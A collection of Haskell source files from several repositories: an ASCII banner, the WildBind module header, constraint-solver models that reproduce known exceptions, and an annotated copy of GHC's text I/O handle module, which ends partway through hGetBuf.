showHeadline :: IO ()
showHeadline = do
  putStrLn "_  __  ____   ___  __    ____  __  _"
  putStrLn "\\\\ \\ / /  / _ \\ / _ /  \\  | \\ ||  //"
  putStrLn " \\\\ \\ / / / / \\ \\ / / / /\\ \\ | [] / || //"
  putStrLn " \\\\ / / / / \\ \\/ / / /__\\ \\| \\ || //"
  putStrLn " \\\\/ / \\ \\___/ /\\ \\_ / / / /| [] \\ ||__//"
  putStrLn " \\_/ \\_______/ \\___ /_/ /_/ |_____/ |___/ "
  putStrLn " __ __ ____ ____ _____ __"
  putStrLn " \\\\\\ / \\ \\ \\ __ | \\ | __ \\ / \\"
  putStrLn " \\\\\\ / /\\ \\ \\ _\\/_ \\ | [] / | | \\ \\ / /\\ \\"
  putStrLn " //\\\\ / /__\\ \\ \\ \\\\/ \\ \\ | \\ | | / / / /__\\ \\"
  putStrLn " // \\\\ \\ \\ \\ \\ \\ \\ \\ \\ | [] \\ | |_/ / / / / /"
  putStrLn " // \\\\ \\_\\ \\_\\ \\_\\ \\_\\|_____/ |____/ /_/ /_/"
  putStrLn ""
| epsilonhalbe/VocabuLambda | Main.hs | bsd-3-clause | 10,889 | 0 | 16 | 4,909 | 2,444 | 1,146 | 1,298 | -1 | -1 |
-- |
-- Module: WildBind
-- Description: WildBind main module
-- Maintainer: Toshio Ito <debug.ito@gmail.com>
--
--
module WildBind
( module WildBind.Binding,
-- | Defines 'Binding' and many functions to build it.
module WildBind.FrontEnd,
-- | Defines 'FrontEnd', an interface between 'Binding' and a
-- desktop environment.
module WildBind.Exec,
-- | Defines functions to combine 'Binding' and 'FrontEnd'
-- into an executable action. You can customize its behavior
-- via 'Option'.
module WildBind.Description,
-- | Defines 'ActionDescription'.
module WildBind.Input.NumPad
-- | Defines input symbol types for number pad keys.
-- * Support modules
--
--
-- | The following modules are not re-exported from this module.
--
-- - "WildBind.Seq": support module to build a binding to key
-- sequences. /Since: 0.1.1.0/
) where
import WildBind.Description
import WildBind.Binding
import WildBind.FrontEnd
import WildBind.Exec
import WildBind.Input.NumPad
| debug-ito/wild-bind | wild-bind/src/WildBind.hs | bsd-3-clause | 1,113 | 0 | 5 | 294 | 84 | 62 | 22 | 11 | 0 |
{-# LANGUAGE TypeFamilies #-}
{-# LANGUAGE FlexibleContexts #-}
module Control.CP.MonadicCpProblems where
import Control.CP.FD.Interface
import ADP.Multi.Constraint.MonadicCpHelper
-- | Solve and print the first problematic model.
main :: IO ()
main = print $ solveModel model
-- | Known-problematic model: solving it throws
-- \"Cannot process EGBoolValue BoolConst True\".
model :: FDModel
model = exists $ \col -> do
  [len1,len2] <- colList col 2
  xsum col @= 2
  len1 @>= 0
  len2 @>= 1
  2 @<= 1 -- this constant (statically false) constraint causes the exception
  return col
-- | Second known-problematic model: solving it throws
-- \"Cannot process EGLess True\".
model2 :: FDModel
model2 = exists $ \col -> do
  [x1,x2,x3,x4] <- colList col 4
  allin col (cte 0,cte 5)
  x1 @<= x2
  x3 @>= x4
  x3 @>= x2 @|| x4 @<= x1 -- this disjunction causes the exception
  return col
| adp-multi/adp-multi-monadiccp | tests/Control/CP/MonadicCpProblems.hs | bsd-3-clause | 715 | 0 | 11 | 148 | 221 | 115 | 106 | 23 | 1 |
{-# LINE 1 "GHC.IO.Handle.Text.hs" #-}
{-# LANGUAGE Trustworthy #-}
{-# LANGUAGE CPP
, NoImplicitPrelude
, RecordWildCards
, BangPatterns
, NondecreasingIndentation
, MagicHash
#-}
{-# OPTIONS_GHC -Wno-name-shadowing #-}
{-# OPTIONS_GHC -Wno-unused-matches #-}
{-# OPTIONS_HADDOCK hide #-}
-----------------------------------------------------------------------------
-- |
-- Module : GHC.IO.Text
-- Copyright : (c) The University of Glasgow, 1992-2008
-- License : see libraries/base/LICENSE
--
-- Maintainer : libraries@haskell.org
-- Stability : internal
-- Portability : non-portable
--
-- String I\/O functions
--
-----------------------------------------------------------------------------
module GHC.IO.Handle.Text (
hWaitForInput, hGetChar, hGetLine, hGetContents, hPutChar, hPutStr,
commitBuffer', -- hack, see below
hGetBuf, hGetBufSome, hGetBufNonBlocking, hPutBuf, hPutBufNonBlocking,
memcpy, hPutStrLn,
) where
import GHC.IO
import GHC.IO.FD
import GHC.IO.Buffer
import qualified GHC.IO.BufferedIO as Buffered
import GHC.IO.Exception
import GHC.Exception
import GHC.IO.Handle.Types
import GHC.IO.Handle.Internals
import qualified GHC.IO.Device as IODevice
import qualified GHC.IO.Device as RawIO
import Foreign
import Foreign.C
import qualified Control.Exception as Exception
import Data.Typeable
import System.IO.Error
import Data.Maybe
import GHC.IORef
import GHC.Base
import GHC.Real
import GHC.Num
import GHC.Show
import GHC.List
-- ---------------------------------------------------------------------------
-- Simple input operations
-- If hWaitForInput finds anything in the Handle's buffer, it
-- immediately returns. If not, it tries to read from the underlying
-- OS handle. Notice that for buffered Handles connected to terminals
-- this means waiting until a complete line is available.
-- | Computation 'hWaitForInput' @hdl t@
-- waits until input is available on handle @hdl@.
-- It returns 'True' as soon as input is available on @hdl@,
-- or 'False' if no input is available within @t@ milliseconds. Note that
-- 'hWaitForInput' waits until one or more full /characters/ are available,
-- which means that it needs to do decoding, and hence may fail
-- with a decoding error.
--
-- If @t@ is less than zero, then @hWaitForInput@ waits indefinitely.
--
-- This operation may fail with:
--
-- * 'isEOFError' if the end of file has been reached.
--
-- * a decoding error, if the input begins with an invalid byte sequence
-- in this Handle's encoding.
--
-- NOTE for GHC users: unless you use the @-threaded@ flag,
-- @hWaitForInput hdl t@ where @t >= 0@ will block all other Haskell
-- threads for the duration of the call. It behaves like a
-- @safe@ foreign call in this respect.
--
hWaitForInput :: Handle -> Int -> IO Bool
hWaitForInput h msecs = do
  wantReadableHandle_ "hWaitForInput" h $ \ handle_@Handle__{..} -> do
  cbuf <- readIORef haCharBuffer
  -- NB. this function relies on NondecreasingIndentation: each
  -- "... else do" below continues at the same indentation level.
  if not (isEmptyBuffer cbuf) then return True else do
  if msecs < 0
        then do cbuf' <- readTextDevice handle_ cbuf
                writeIORef haCharBuffer cbuf'
                return True
        else do
               -- there might be bytes in the byte buffer waiting to be decoded
               cbuf' <- decodeByteBuf handle_ cbuf
               writeIORef haCharBuffer cbuf'
               if not (isEmptyBuffer cbuf') then return True else do
                r <- IODevice.ready haDevice False{-read-} msecs
                if r then do -- Call hLookAhead' to throw an EOF
                             -- exception if appropriate
                             _ <- hLookAhead_ handle_
                             return True
                     else return False
-- XXX we should only return when there are full characters
-- not when there are only bytes. That would mean looping
-- and re-running IODevice.ready if we don't have any full
-- characters; but we don't know how long we've waited
-- so far.
-- ---------------------------------------------------------------------------
-- hGetChar
-- | Computation 'hGetChar' @hdl@ reads a character from the file or
-- channel managed by @hdl@, blocking until a character is available.
--
-- This operation may fail with:
--
-- * 'isEOFError' if the end of file has been reached.
hGetChar :: Handle -> IO Char
hGetChar handle =
  wantReadableHandle_ "hGetChar" handle $ \handle_@Handle__{..} -> do
  -- buffering mode makes no difference: we just read whatever is available
  -- from the device (blocking only if there is nothing available), and then
  -- return the first character.
  -- See [note Buffered Reading] in GHC.IO.Handle.Types
  buf0 <- readIORef haCharBuffer
  buf1 <- if isEmptyBuffer buf0
             then readTextDevice handle_ buf0
             else return buf0
  (c1,i) <- readCharBuf (bufRaw buf1) (bufL buf1)
  let buf2 = bufferAdjustL i buf1
  -- In CRLF translation mode a '\r' may be the first half of a "\r\n"
  -- pair, so we may need one more character to decide what to return.
  if haInputNL == CRLF && c1 == '\r'
     then do
            mbuf3 <- if isEmptyBuffer buf2
                      then maybeFillReadBuffer handle_ buf2
                      else return (Just buf2)
            case mbuf3 of
               -- EOF, so just return the '\r' we have
               Nothing -> do
                  writeIORef haCharBuffer buf2
                  return '\r'
               Just buf3 -> do
                  (c2,i2) <- readCharBuf (bufRaw buf2) (bufL buf2)
                  if c2 == '\n'
                     then do
                       writeIORef haCharBuffer (bufferAdjustL i2 buf3)
                       return '\n'
                     else do
                       -- not a \r\n sequence, so just return the \r
                       writeIORef haCharBuffer buf3
                       return '\r'
     else do
            writeIORef haCharBuffer buf2
            return c1
-- ---------------------------------------------------------------------------
-- hGetLine
-- | Computation 'hGetLine' @hdl@ reads a line from the file or
-- channel managed by @hdl@.
--
-- This operation may fail with:
--
-- * 'isEOFError' if the end of file is encountered when reading
-- the /first/ character of the line.
--
-- If 'hGetLine' encounters end-of-file at any other point while reading
-- in a line, it is treated as a line terminator and the (partial)
-- line is returned.
-- Implemented in terms of 'hGetLineBuffered'; the handle lock is held
-- for the whole line read.
hGetLine :: Handle -> IO String
hGetLine h = wantReadableHandle_ "hGetLine" h hGetLineBuffered
-- Start the line-reading loop from the handle's current character
-- buffer, with no chunks accumulated yet.
hGetLineBuffered :: Handle__ -> IO String
hGetLineBuffered handle_@Handle__{..} = do
  initialBuf <- readIORef haCharBuffer
  hGetLineBufferedLoop handle_ initialBuf []
-- Worker loop for hGetLine.  @xss@ accumulates the already-unpacked
-- chunks of the line in reverse order; they are reversed and
-- concatenated once a '\n' (or EOF) is found.
hGetLineBufferedLoop :: Handle__
                     -> CharBuffer -> [String]
                     -> IO String
hGetLineBufferedLoop handle_@Handle__{..}
        buf@Buffer{ bufL=r0, bufR=w, bufRaw=raw0 } xss =
  let
        -- find the end-of-line character, if there is one
        loop raw r
           | r == w = return (False, w)
           | otherwise = do
                (c,r') <- readCharBuf raw r
                if c == '\n'
                   then return (True, r) -- NB. not r': don't include the '\n'
                   else loop raw r'
  in do
  (eol, off) <- loop raw0 r0
  debugIO ("hGetLineBufferedLoop: r=" ++ show r0 ++ ", w=" ++ show w ++ ", off=" ++ show off)
  (xs,r') <- if haInputNL == CRLF
                then unpack_nl raw0 r0 off ""
                else do xs <- unpack raw0 r0 off ""
                        return (xs,off)
  -- if eol == True, then off is the offset of the '\n'
  -- otherwise off == w and the buffer is now empty.
  if eol -- r' == off
        then do writeIORef haCharBuffer (bufferAdjustL (off+1) buf)
                return (concat (reverse (xs:xss)))
        else do
             let buf1 = bufferAdjustL r' buf
             maybe_buf <- maybeFillReadBuffer handle_ buf1
             case maybe_buf of
                -- Nothing indicates we caught an EOF, and we may have a
                -- partial line to return.
                Nothing -> do
                     -- we reached EOF.  There might be a lone \r left
                     -- in the buffer, so check for that and
                     -- append it to the line if necessary.
                     --
                     let pre = if not (isEmptyBuffer buf1) then "\r" else ""
                     writeIORef haCharBuffer buf1{ bufL=0, bufR=0 }
                     let str = concat (reverse (pre:xs:xss))
                     if not (null str)
                        then return str
                        else ioe_EOF
                Just new_buf ->
                     hGetLineBufferedLoop handle_ new_buf (xs:xss)
-- Refill the character buffer, mapping an EOF exception to 'Nothing'
-- and re-raising every other IOError.
maybeFillReadBuffer :: Handle__ -> CharBuffer -> IO (Maybe CharBuffer)
maybeFillReadBuffer handle_ buf =
  catchException
    (Just `fmap` getSomeCharacters handle_ buf)
    (\e -> if isEOFError e
              then return Nothing
              else ioError e)
-- See GHC.IO.Buffer
-- #define CHARBUF_UTF16
-- NB. performance-critical code: eyeball the Core.
-- Unpack the characters in buffer positions [r, w) onto the front of
-- acc0, walking backwards so the list is built in order.
unpack :: RawCharBuffer -> Int -> Int -> [Char] -> IO [Char]
unpack !buf !r !w acc0
 | r == w = return acc0
 | otherwise =
  withRawBuffer buf $ \pbuf ->
    let
        unpackRB acc !i
         | i < r = return acc
         | otherwise = do
              -- Here, we are rather careful to only put an *evaluated* character
              -- in the output string. Due to pointer tagging, this allows the consumer
              -- to avoid ping-ponging between the actual consumer code and the thunk code
              c <- peekElemOff pbuf i
              unpackRB (c : acc) (i-1)
     in
        unpackRB acc0 (w-1)
-- NB. performance-critical code: eyeball the Core.
-- CRLF-translating variant of 'unpack': "\r\n" pairs become a single
-- '\n'.  Also returns the new end-of-valid-data offset, because a
-- trailing lone '\r' is deliberately left in the buffer (we cannot
-- know yet whether a '\n' follows it).
unpack_nl :: RawCharBuffer -> Int -> Int -> [Char] -> IO ([Char],Int)
unpack_nl !buf !r !w acc0
 | r == w = return (acc0, 0)
 | otherwise =
  withRawBuffer buf $ \pbuf ->
    let
        unpackRB acc !i
         | i < r = return acc
         | otherwise = do
              c <- peekElemOff pbuf i
              if (c == '\n' && i > r)
                 then do
                         c1 <- peekElemOff pbuf (i-1)
                         if (c1 == '\r')
                            then unpackRB ('\n':acc) (i-2)
                            else unpackRB ('\n':acc) (i-1)
                 else do
                         unpackRB (c : acc) (i-1)
     in do
        c <- peekElemOff pbuf (w-1)
        if (c == '\r')
           then do
                   -- If the last char is a '\r', we need to know whether or
                   -- not it is followed by a '\n', so leave it in the buffer
                   -- for now and just unpack the rest.
                   str <- unpackRB acc0 (w-2)
                   return (str, w-1)
           else do
                   str <- unpackRB acc0 (w-1)
                   return (str, w)
-- Note [#5536]
--
-- We originally had
--
-- let c' = desurrogatifyRoundtripCharacter c in
-- c' `seq` unpackRB (c':acc) (i-1)
--
-- but this resulted in Core like
--
-- case (case x <# y of True -> C# e1; False -> C# e2) of c
-- C# _ -> unpackRB (c:acc) (i-1)
--
-- which compiles into a continuation for the outer case, with each
-- branch of the inner case building a C# and then jumping to the
-- continuation. We'd rather not have this extra jump, which makes
-- quite a difference to performance (see #5536) It turns out that
-- matching on the C# directly causes GHC to do the case-of-case,
-- giving much straighter code.
-- -----------------------------------------------------------------------------
-- hGetContents
-- hGetContents on a DuplexHandle only affects the read side: you can
-- carry on writing to it afterwards.
-- | Computation 'hGetContents' @hdl@ returns the list of characters
-- corresponding to the unread portion of the channel or file managed
-- by @hdl@, which is put into an intermediate state, /semi-closed/.
-- In this state, @hdl@ is effectively closed,
-- but items are read from @hdl@ on demand and accumulated in a special
-- list returned by 'hGetContents' @hdl@.
--
-- Any operation that fails because a handle is closed,
-- also fails if a handle is semi-closed. The only exception is 'hClose'.
-- A semi-closed handle becomes closed:
--
-- * if 'hClose' is applied to it;
--
-- * if an I\/O error occurs when reading an item from the handle;
--
-- * or once the entire contents of the handle has been read.
--
-- Once a semi-closed handle becomes closed, the contents of the
-- associated list becomes fixed. The contents of this final list is
-- only partially specified: it will contain at least all the items of
-- the stream that were evaluated prior to the handle becoming closed.
--
-- Any I\/O errors encountered while a handle is semi-closed are simply
-- discarded.
--
-- This operation may fail with:
--
-- * 'isEOFError' if the end of file has been reached.
hGetContents :: Handle -> IO String
hGetContents handle =
   wantReadableHandle "hGetContents" handle $ \handle_ -> do
      -- mark the handle semi-closed; the actual reading happens lazily
      -- in 'lazyRead' as the returned list is consumed.
      xs <- lazyRead handle
      return (handle_{ haType=SemiClosedHandle}, xs )
-- Note that someone may close the semi-closed handle (or change its
-- buffering), so each time these lazy read functions are pulled on,
-- they have to check whether the handle has indeed been closed.
-- Produce the rest of the contents lazily.  Each time the thunk is
-- forced we re-take the handle lock and re-check its state, because
-- the handle may have been closed since the previous chunk was read.
lazyRead :: Handle -> IO String
lazyRead handle =
   unsafeInterleaveIO $
        withHandle "hGetContents" handle $ \ handle_ -> do
        case haType handle_ of
          SemiClosedHandle -> lazyReadBuffered handle handle_
          ClosedHandle
            -> ioException
                  (IOError (Just handle) IllegalOperation "hGetContents"
                        "delayed read on closed handle" Nothing Nothing)
          _ -> ioException
                  (IOError (Just handle) IllegalOperation "hGetContents"
                        "illegal handle type" Nothing Nothing)
-- One lazy chunk: unpack whatever is currently buffered, with the
-- (lazily read) rest of the stream as the list tail.  On any
-- exception the handle is closed; EOF ends the list, other errors
-- are re-thrown when the list tail is forced.
lazyReadBuffered :: Handle -> Handle__ -> IO (Handle__, [Char])
lazyReadBuffered h handle_@Handle__{..} = do
   buf <- readIORef haCharBuffer
   Exception.catch
        (do
            buf'@Buffer{..} <- getSomeCharacters handle_ buf
            lazy_rest <- lazyRead h
            (s,r) <- if haInputNL == CRLF
                         then unpack_nl bufRaw bufL bufR lazy_rest
                         else do s <- unpack bufRaw bufL bufR lazy_rest
                                 return (s,bufR)
            writeIORef haCharBuffer (bufferAdjustL r buf')
            return (handle_, s)
        )
        (\e -> do (handle_', _) <- hClose_help handle_
                  debugIO ("hGetContents caught: " ++ show e)
                  -- We might have a \r cached in CRLF mode.  So we
                  -- need to check for that and return it:
                  let r = if isEOFError e
                             then if not (isEmptyBuffer buf)
                                     then "\r"
                                     else ""
                             else
                                  throw (augmentIOError e "hGetContents" h)
                  return (handle_', r)
        )
-- ensure we have some characters in the buffer
-- ensure we have some characters in the buffer
getSomeCharacters :: Handle__ -> CharBuffer -> IO CharBuffer
getSomeCharacters handle_@Handle__{..} buf@Buffer{..} =
  case bufferElems buf of
    -- buffer empty: read some more
    0 -> readTextDevice handle_ buf
    -- if the buffer has a single '\r' in it and we're doing newline
    -- translation: read some more, since a lone '\r' cannot be
    -- returned until we know whether a '\n' follows it.
    1 | haInputNL == CRLF -> do
      (c,_) <- readCharBuf bufRaw bufL
      if c == '\r'
         then do -- shuffle the '\r' to the beginning.  This is only safe
                 -- if we're about to call readTextDevice, otherwise it
                 -- would mess up flushCharBuffer.
                 -- See [note Buffer Flushing], GHC.IO.Handle.Types
                 _ <- writeCharBuf bufRaw 0 '\r'
                 let buf' = buf{ bufL=0, bufR=1 }
                 readTextDevice handle_ buf'
         else do
                 return buf
    -- buffer has some chars in it already: just return it
    _otherwise ->
      return buf
-- ---------------------------------------------------------------------------
-- hPutChar
-- | Computation 'hPutChar' @hdl ch@ writes the character @ch@ to the
-- file or channel managed by @hdl@. Characters may be buffered if
-- buffering is enabled for @hdl@.
--
-- This operation may fail with:
--
-- * 'isFullError' if the device is full; or
--
-- * 'isPermissionError' if another system resource limit would be exceeded.
-- Force the character before taking the handle lock, so an exception
-- from evaluating it cannot fire while the lock is held.
hPutChar :: Handle -> Char -> IO ()
hPutChar handle ch =
  ch `seq`
  wantWritableHandle "hPutChar" handle (\ handle_ -> hPutcBuffered handle_ ch)
-- Append one character to the handle's character buffer, expanding
-- '\n' to "\r\n" in CRLF mode, and flush if the handle is
-- line-buffered and the character ends a line.
hPutcBuffered :: Handle__ -> Char -> IO ()
hPutcBuffered handle_@Handle__{..} c = do
  buf <- readIORef haCharBuffer
  if c == '\n'
     then do buf1 <- if haOutputNL == CRLF
                        then do
                          buf1 <- putc buf '\r'
                          putc buf1 '\n'
                        else do
                          putc buf '\n'
             writeCharBuffer handle_ buf1
             when is_line $ flushByteWriteBuffer handle_
      else do
          buf1 <- putc buf c
          writeCharBuffer handle_ buf1
          return ()
  where
    is_line = case haBufferMode of
                LineBuffering -> True
                _             -> False
    -- write one char at the buffer's write pointer, returning the
    -- buffer with the pointer advanced
    putc buf@Buffer{ bufRaw=raw, bufR=w } c = do
       debugIO ("putc: " ++ summaryBuffer buf)
       w' <- writeCharBuf raw w c
       return buf{ bufR = w' }
-- ---------------------------------------------------------------------------
-- hPutStr
-- We go to some trouble to avoid keeping the handle locked while we're
-- evaluating the string argument to hPutStr, in case doing so triggers another
-- I/O operation on the same handle which would lead to deadlock. The classic
-- case is
--
-- putStr (trace "hello" "world")
--
-- so the basic scheme is this:
--
-- * copy the string into a fresh buffer,
-- * "commit" the buffer to the handle.
--
-- Committing may involve simply copying the contents of the new
-- buffer into the handle's buffer, flushing one or both buffers, or
-- maybe just swapping the buffers over (if the handle's buffer was
-- empty). See commitBuffer below.
-- | Computation 'hPutStr' @hdl s@ writes the string
-- @s@ to the file or channel managed by @hdl@.
--
-- This operation may fail with:
--
-- * 'isFullError' if the device is full; or
--
-- * 'isPermissionError' if another system resource limit would be exceeded.
-- | Write a 'String' to the handle, without a trailing newline.
hPutStr :: Handle -> String -> IO ()
hPutStr hdl s = hPutStr' hdl s False
-- | The same as 'hPutStr', but adds a newline character.
-- | Like 'hPutStr' but the newline is appended inside the same
-- encoding pass, avoiding a separate 'hPutChar' call.
hPutStrLn :: Handle -> String -> IO ()
hPutStrLn hdl s = hPutStr' hdl s True
-- An optimisation: we treat hPutStrLn specially, to avoid the
-- overhead of a single putChar '\n', which is quite high now that we
-- have to encode eagerly.
-- Shared implementation of hPutStr/hPutStrLn.  The handle lock is
-- only held briefly to grab a spare buffer; the string is then
-- evaluated and copied outside the lock (see the deadlock note above).
hPutStr' :: Handle -> String -> Bool -> IO ()
hPutStr' handle str add_nl =
  do
    (buffer_mode, nl) <-
         wantWritableHandle "hPutStr" handle $ \h_ -> do
                       bmode <- getSpareBuffer h_
                       return (bmode, haOutputNL h_)
    case buffer_mode of
       (NoBuffering, _) -> do
            hPutChars handle str -- v. slow, but we don't care
            when add_nl $ hPutChar handle '\n'
       (LineBuffering, buf) -> do
            writeBlocks handle True add_nl nl buf str
       (BlockBuffering _, buf) -> do
            writeBlocks handle False add_nl nl buf str
-- Write each character individually: the unbuffered (very slow) path.
hPutChars :: Handle -> [Char] -> IO ()
hPutChars _   []        = return ()
hPutChars hdl (ch:rest) = hPutChar hdl ch >> hPutChars hdl rest
-- Grab a write buffer to fill outside the handle lock: reuse one from
-- the handle's spare-buffer list if available, otherwise allocate a
-- fresh one of the same size as the current buffer.
getSpareBuffer :: Handle__ -> IO (BufferMode, CharBuffer)
getSpareBuffer Handle__{haCharBuffer=ref,
                        haBuffers=spare_ref,
                        haBufferMode=mode}
 = do
   case mode of
     NoBuffering -> return (mode, errorWithoutStackTrace "no buffer!")
     _ -> do
          bufs <- readIORef spare_ref
          buf <- readIORef ref
          case bufs of
            BufferListCons b rest -> do
                writeIORef spare_ref rest
                return ( mode, emptyBuffer b (bufSize buf) WriteBuffer)
            BufferListNil -> do
                new_buf <- newCharBuffer (bufSize buf) WriteBuffer
                return (mode, new_buf)
-- NB. performance-critical code: eyeball the Core.
-- Copy the string into the spare buffer in chunks, committing each
-- full chunk to the handle.  @rest@ holds a pending suffix (used to
-- append the final "\n" for hPutStrLn without a separate pass).
writeBlocks :: Handle -> Bool -> Bool -> Newline -> Buffer CharBufElem -> String -> IO ()
writeBlocks hdl line_buffered add_nl nl
            buf@Buffer{ bufRaw=raw, bufSize=len } s =
  let
   shoveString :: Int -> [Char] -> [Char] -> IO ()
   shoveString !n [] [] = do
        commitBuffer hdl raw len n False{-no flush-} True{-release-}
   shoveString !n [] rest = do
        shoveString n rest []
   shoveString !n (c:cs) rest
     -- n+1 so we have enough room to write '\r\n' if necessary
     | n + 1 >= len = do
        commitBuffer hdl raw len n False{-no flush-} False{-no release-}
        shoveString 0 (c:cs) rest
     | c == '\n' = do
        n' <- if nl == CRLF
                 then do
                    n1 <- writeCharBuf raw n '\r'
                    writeCharBuf raw n1 '\n'
                 else do
                    writeCharBuf raw n c
        if line_buffered
           then do
               -- end of line, so write and flush
               commitBuffer hdl raw len n' True{-flush-} False
               shoveString 0 cs rest
           else do
               shoveString n' cs rest
     | otherwise = do
        n' <- writeCharBuf raw n c
        shoveString n' cs rest
  in
  shoveString 0 s (if add_nl then "\n" else "")
-- -----------------------------------------------------------------------------
-- commitBuffer handle buf sz count flush release
--
-- Write the contents of the buffer 'buf' ('sz' bytes long, containing
-- 'count' bytes of data) to handle (handle must be block or line buffered).
commitBuffer
        :: Handle                       -- handle to commit to
        -> RawCharBuffer -> Int         -- address and size (in bytes) of buffer
        -> Int                          -- number of bytes of data in buffer
        -> Bool                         -- True <=> flush the handle afterward
        -> Bool                         -- release the buffer?
        -> IO ()
commitBuffer hdl !raw !sz !count flush release =
  wantWritableHandle "commitBuffer" hdl $ \h_@Handle__{..} -> do
      debugIO ("commitBuffer: sz=" ++ show sz ++ ", count=" ++ show count
            ++ ", flush=" ++ show flush ++ ", release=" ++ show release)
      writeCharBuffer h_ Buffer{ bufRaw=raw, bufState=WriteBuffer,
                                 bufL=0, bufR=count, bufSize=sz }
      when flush $ flushByteWriteBuffer h_
      -- release the buffer if necessary
      when release $ do
          -- find size of current buffer; only recycle the spare buffer
          -- when the handle's buffer size hasn't changed meanwhile
          old_buf@Buffer{ bufSize=size } <- readIORef haCharBuffer
          when (sz == size) $ do
               spare_bufs <- readIORef haBuffers
               writeIORef haBuffers (BufferListCons raw spare_bufs)
      return ()
-- backwards compatibility; the text package uses this
-- Variant of 'commitBuffer' that takes an already-locked Handle__ and
-- returns the committed buffer; kept for the @text@ package.
commitBuffer' :: RawCharBuffer -> Int -> Int -> Bool -> Bool -> Handle__
              -> IO CharBuffer
commitBuffer' raw sz@(I# _) count@(I# _) flush release h_@Handle__{..}
   = do
      debugIO ("commitBuffer: sz=" ++ show sz ++ ", count=" ++ show count
            ++ ", flush=" ++ show flush ++ ", release=" ++ show release)
      let this_buf = Buffer{ bufRaw=raw, bufState=WriteBuffer,
                             bufL=0, bufR=count, bufSize=sz }
      writeCharBuffer h_ this_buf
      when flush $ flushByteWriteBuffer h_
      -- release the buffer if necessary
      when release $ do
          -- find size of current buffer
          old_buf@Buffer{ bufSize=size } <- readIORef haCharBuffer
          when (sz == size) $ do
               spare_bufs <- readIORef haBuffers
               writeIORef haBuffers (BufferListCons raw spare_bufs)
      return this_buf
-- ---------------------------------------------------------------------------
-- Reading/writing sequences of bytes.
-- ---------------------------------------------------------------------------
-- hPutBuf
-- | 'hPutBuf' @hdl buf count@ writes @count@ 8-bit bytes from the
-- buffer @buf@ to the handle @hdl@. It returns ().
--
-- 'hPutBuf' ignores any text encoding that applies to the 'Handle',
-- writing the bytes directly to the underlying file or device.
--
-- 'hPutBuf' ignores the prevailing 'TextEncoding' and
-- 'NewlineMode' on the 'Handle', and writes bytes directly.
--
-- This operation may fail with:
--
-- * 'ResourceVanished' if the handle is a pipe or socket, and the
-- reading end is closed. (If this is a POSIX system, and the program
-- has not asked to ignore SIGPIPE, then a SIGPIPE may be delivered
-- instead, whose default action is to terminate the program).
hPutBuf :: Handle  -- handle to write to
        -> Ptr a   -- address of buffer
        -> Int     -- number of bytes of data in buffer
        -> IO ()
-- Blocking variant: delegate to hPutBuf' and drop its byte count.
hPutBuf h ptr count = hPutBuf' h ptr count True >> return ()
-- | Non-blocking variant of 'hPutBuf': writes as much as possible without
-- blocking and returns how many bytes were actually written.
hPutBufNonBlocking
  :: Handle   -- handle to write to
  -> Ptr a    -- address of buffer
  -> Int      -- number of bytes of data in buffer
  -> IO Int   -- returns: number of bytes written
hPutBufNonBlocking h ptr count = hPutBuf' h ptr count False

-- | Shared worker for 'hPutBuf' / 'hPutBufNonBlocking'.  Validates the
-- byte count, then pushes the data through 'bufWrite'.
hPutBuf':: Handle  -- handle to write to
        -> Ptr a   -- address of buffer
        -> Int     -- number of bytes of data in buffer
        -> Bool    -- allow blocking?
        -> IO Int
hPutBuf' handle ptr count can_block
  | count == 0 = return 0
  | count < 0  = illegalBufferSize handle "hPutBuf" count
  | otherwise =
      wantWritableHandle "hPutBuf" handle $
        \ h_@Handle__{..} -> do
          debugIO ("hPutBuf count=" ++ show count)
          r <- bufWrite h_ (castPtr ptr) count can_block
          -- we must flush if this Handle is set to NoBuffering.  If
          -- it is set to LineBuffering, be conservative and flush
          -- anyway (we didn't check for newlines in the data).
          case haBufferMode of
            BlockBuffering _      -> do return ()
            _line_or_no_buffering -> do flushWriteBuffer h_
          return r
-- | Copy @count@ bytes from @ptr@ into the handle's byte buffer,
-- flushing first if there is not enough room.  Oversized writes bypass
-- the buffer entirely via 'writeChunk' / 'writeChunkNonBlocking'.
bufWrite :: Handle__-> Ptr Word8 -> Int -> Bool -> IO Int
bufWrite h_@Handle__{..} ptr count can_block =
  seq count $ do  -- strictness hack
  old_buf@Buffer{ bufRaw=old_raw, bufR=w, bufSize=size }
     <- readIORef haByteBuffer
  -- enough room in handle buffer?
  if (size - w > count)
     -- There's enough room in the buffer:
     -- just copy the data in and update bufR.
     then do debugIO ("hPutBuf: copying to buffer, w=" ++ show w)
             copyToRawBuffer old_raw w ptr count
             writeIORef haByteBuffer old_buf{ bufR = w + count }
             return count
     -- else, we have to flush
     else do debugIO "hPutBuf: flushing first"
             old_buf' <- Buffered.flushWriteBuffer haDevice old_buf
                     -- TODO: we should do a non-blocking flush here
             writeIORef haByteBuffer old_buf'
             -- if we can fit in the buffer, then just loop
             if count < size
                then bufWrite h_ ptr count can_block
                else if can_block
                        then do writeChunk h_ (castPtr ptr) count
                                return count
                        else writeChunkNonBlocking h_ (castPtr ptr) count
-- | Write a chunk straight to the underlying device, bypassing buffering.
-- Only 'FD'-backed devices are supported; anything else is unimplemented.
writeChunk :: Handle__ -> Ptr Word8 -> Int -> IO ()
writeChunk h_@Handle__{..} ptr bytes
  | Just fd <- cast haDevice = RawIO.write (fd::FD) ptr bytes
  | otherwise = error "Todo: hPutBuf"

-- | Non-blocking counterpart of 'writeChunk'; returns bytes written.
writeChunkNonBlocking :: Handle__ -> Ptr Word8 -> Int -> IO Int
writeChunkNonBlocking h_@Handle__{..} ptr bytes
  | Just fd <- cast haDevice = RawIO.writeNonBlocking (fd::FD) ptr bytes
  | otherwise = error "Todo: hPutBuf"
-- ---------------------------------------------------------------------------
-- hGetBuf
-- | 'hGetBuf' @hdl buf count@ reads data from the handle @hdl@
-- into the buffer @buf@ until either EOF is reached or
-- @count@ 8-bit bytes have been read.
-- It returns the number of bytes actually read. This may be zero if
-- EOF was reached before any data was read (or if @count@ is zero).
--
-- 'hGetBuf' never raises an EOF exception, instead it returns a value
-- smaller than @count@.
--
-- If the handle is a pipe or socket, and the writing end
-- is closed, 'hGetBuf' will behave as if EOF was reached.
--
-- 'hGetBuf' ignores the prevailing 'TextEncoding' and 'NewlineMode'
-- on the 'Handle', and reads bytes directly.
-- | Read up to @count@ bytes into @ptr@; returns the number of bytes
-- actually read (0 on immediate EOF).  Dispatches on whether the byte
-- buffer already holds data.
--
-- Fix: the original destructured the buffer's @bufRaw@/@bufR@/@bufL@/
-- @bufSize@ fields without using any of them; the bindings are dropped.
hGetBuf :: Handle -> Ptr a -> Int -> IO Int
hGetBuf h ptr count
  | count == 0 = return 0
